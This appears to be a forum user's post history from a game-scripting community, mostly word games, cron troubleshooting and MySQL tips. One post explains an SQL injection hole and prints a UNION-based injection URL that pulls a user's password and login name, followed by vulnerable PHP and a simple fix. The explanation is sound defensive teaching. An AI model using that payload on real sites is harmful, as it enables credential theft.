Spudinski

Re: Clean up cron It is never a good idea to delete content, especially users and forum posts. You could rather send the users an email, and tell them that their account indeed still exists. Also, removing unimportant logs is fine, but other types of logs such as access logs, is not a very god idea. But for this purpose, a game, it is fine, but I would like to suggest keeping logs for a longer period than 30 days, you might find it very useful to have older logs.

Re: 3 Word Game * He's not supposed to die.. the way to

Re: 3 Word Game help but tragically

Re: Count Backwards :D 4982

Re: 3 Word Game and went to

Re: Guess the next poster (: Yep. Killah next...

Re: 3 Word Game and then he

Re: Counting (nr game) 1842

Re: crons Please post the actual cron file that is supposed to update the stats you mentioned above.

Re: forum SQL injection Someone recently posted a small forum modification for mccodes, I think it may be for all versions. Having a forum application is unnecessary, since you only need it to host posts, not an PM system or things like that. Unless you want to make an addition, if it is going to be used allot. I think Amazon Survival did the right thing when it came to them, they are using an forum application(vBulletin), outside of their main game, that way you can give help to visitors that might have a problem. To give an answer to the original question: I don't have mccodes version 2, that has the vulnerability, so I cannot say for sure. Although it would properly be a simple case of the input variable not being sanitised, see examples below. The url would normally be http://www.example.com/forums.php?cat_id=1, but it can be compromised by someone, making it: http://www.example.com/forums.php?cat_id=-1 UNION ALL SELECT NULL, NULL, USER(), HOST(), userpass, login_name, NULL, NULL FROM users WHERE userid=1 -- Anyone that knows MySQL would know what that would do. Here is the type of programming that would be vulnerable to such input strings. <?php $cat_id = $_GET['cat_id']; $query_txt = 'SELECT * FROM `categories` WHERE `cat_id` = \'' . $cat_id . '\''; $query = mysql_query($query); while($data = mysql_fetch_assoc($query)) { ... } ?> A simple fix would be just to check if the input string is numeric. <?php $cat_id = (preg_match('/^[0-9]+$/i', $_GET['cat_id']) ? $_GET['cat_id'] : 1); // assuming cat_id 1 exists. $query_txt = 'SELECT * FROM `categories` WHERE `cat_id` = \'' . $cat_id . '\''; $query = mysql_query($query); while($data = mysql_fetch_assoc($query)) { ... } ?> Hope it answers your question.

Re: crons It might be your host, that would be the most likely thing. If you doubt it is that, try entering your email at the crontabs page(cPanel), and look at the output.

Re: crons Have you enabled/added the cron script yet? If not - there is a ggood tutorial to do it in the FAQ section.

Re: Movies I watched School of Scoundrals again wiht a friend last night, pretty good. Hitman I have also seen reacently, quite good.

Re: Staff Password without sql's. (ANY VERSION) I agree Whit Nyna, it would be much better that way. And when you decide you want to make it with password from a mysql table, you just combine the both, php has some nice functions to work Whit apache authentication methods.

Re: Tables ID It would take a few milliseconds(0.004?) to alter the AUTO_INCREMEMENT value of a table. It would take about 5 minutes to do the way you are suggesting.

Re: Guess Who! The goal of this thread is for any possible problems that may occur, or if someone wants to say something productive about the modification, so lets keep it that way. (:

Re: Guess Who! Thank you Ammo, but the script does detect what version you have, and makes changes based on that. I got the idea from Isomerizer *thanks*.

Re: Guess Who!   I made it free? lol, I updated the post above.

Re: Introductions Hi, welcome to the forums. There are allot of useful resources here, so I'm sure you will learn allot.

Re: Tables ID Somewhere somehow your script must have made an addition of 90+ rows to the table, and then deleted it. No need to delete the whole thing, just reset the AUTO_INCREMENT value. I reckon you have set the ids of the cities already, so based upon your last id, modify the following: ALTER TABLE `cities` AUTO_INCREMENT = 12 The number, change it to the last id in the table, plus one. Now just run that in phpmyadmin and it should be fine.

Re: Staff Password without sql's. (ANY VERSION) A problem I can already see that will happen with some passwords they might choose. You really do not have to clean strings that are going to be compared with variables/plaintext.

Re: Counting (nr game) 1840

Re: Guess the next poster Nope, riderdaz.

Re: Guess the next poster No. -Matt- next.

Re: TwIsTeD WiShEs ! Granted. People starts to think they know everything and starts to show off the whole time. I wish I could get a 100% accuracy on all songs in FoF... (: